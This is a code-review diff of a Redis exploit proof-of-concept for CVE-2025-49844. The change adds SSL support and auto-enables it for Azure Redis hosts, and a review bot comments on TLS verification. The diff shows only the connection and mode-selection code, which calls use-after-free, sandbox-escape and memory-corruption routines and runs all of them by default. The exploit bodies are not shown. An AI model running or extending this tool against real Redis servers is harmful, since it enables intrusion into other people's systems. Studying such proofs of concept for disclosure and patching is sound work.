29 changes: 17 additions & 12 deletions exploit_poc.py
Expand Up @@ -30,21 +30,21 @@ def banner():
╚═══════════════════════════════════════════════════════════╝{Style.RESET_ALL}
""")

def test_connection(host, port, password=None):
def test_connection(host, port, password=None, use_ssl=False):
"""Test connection to Redis instance"""
try:
print(f"{Fore.YELLOW}[*] Testing connection to {host}:{port}...{Style.RESET_ALL}")
r = redis.Redis(host=host, port=port, password=password, decode_responses=True)
r = redis.Redis(host=host, port=port, password=password, decode_responses=True, ssl=use_ssl)
info = r.info()
print(f"{Fore.GREEN}[+] Connected successfully!{Style.RESET_ALL}")
print(f"{Fore.CYAN}[i] Redis Version: {info.get('redis_version', 'Unknown')}{Style.RESET_ALL}")
return r
except redis.ConnectionError as e:
print(f"{Fore.RED}[-] Connection failed: {e}{Style.RESET_ALL}")
return None
except redis.AuthenticationError:
print(f"{Fore.RED}[-] Authentication failed!{Style.RESET_ALL}")
return None
except redis.ConnectionError as e:
print(f"{Fore.RED}[-] Connection failed: {e}{Style.RESET_ALL}")
return None

def check_lua_enabled(r):
"""Check if Lua scripting is enabled"""
Expand Down Expand Up @@ -235,15 +235,20 @@ def main():
parser.add_argument('-H', '--host', default='localhost', help='Redis host (default: localhost)')
parser.add_argument('-p', '--port', type=int, default=6379, help='Redis port (default: 6379)')
parser.add_argument('-a', '--auth', help='Redis password (if required)')
parser.add_argument('--ssl', action='store_true', help='Connect with SSL/TLS (Azure Redis requires this)')
parser.add_argument('-m', '--mode', choices=['check', 'basic', 'sandbox', 'advanced', 'all'],
default='all', help='Exploit mode (default: all)')

args = parser.parse_args()

banner()

# Connect to Redis
r = test_connection(args.host, args.port, args.auth)
# Auto-enable SSL for Azure hosts (if not explicitly set)
use_ssl = args.ssl
if (not use_ssl and args.host.endswith('.redis.cache.windows.net')):
use_ssl = True
print(f"{Fore.YELLOW}[i] SSL enabled automatically for Azure Redis host{Style.RESET_ALL}")

r = test_connection(args.host, args.port, args.auth, use_ssl)
if not r:
sys.exit(1)

Expand All @@ -260,17 +265,17 @@ def main():
print(f"\n{Fore.CYAN}[i] Check mode only - no exploit attempts{Style.RESET_ALL}")
elif args.mode in ['basic', 'all']:
exploit_uaf_basic(r)

if args.mode in ['sandbox', 'all']:
exploit_sandbox_escape(r)

if args.mode in ['advanced', 'all']:
exploit_memory_corruption(r)

print(f"\n{Fore.CYAN}{'='*60}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[*] PoC execution completed{Style.RESET_ALL}")
print(f"{Fore.CYAN}{'='*60}{Style.RESET_ALL}")

print(f"\n{Fore.RED}DISCLAIMER:{Style.RESET_ALL}")
print("This PoC is simplified and for educational purposes only.")
print("The actual CVE-2025-49844 exploit involves complex memory manipulation.")
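Review bot: In `test_connection` (first hunk) the new `ssl=use_ssl` argument leaves certificate and hostname verification to redis-py's defaults, and the hostname-check default may differ between redis-py releases, so the `-a` password can end up being sent to an endpoint whose identity was never checked. Pin the behaviour explicitly: `r = redis.Redis(host=host, port=port, password=password, decode_responses=True, ssl=use_ssl, ssl_cert_reqs="required", ssl_check_hostname=True)`. The docstring should also describe `use_ssl` and state that with `use_ssl=False` the password and all replies cross the network in cleartext. In `main()` (second hunk; the function starts and ends outside the visible lines) the flag is passed positionally, and `test_connection(args.host, args.port, args.auth, use_ssl=use_ssl)` would keep it from being confused with another argument later.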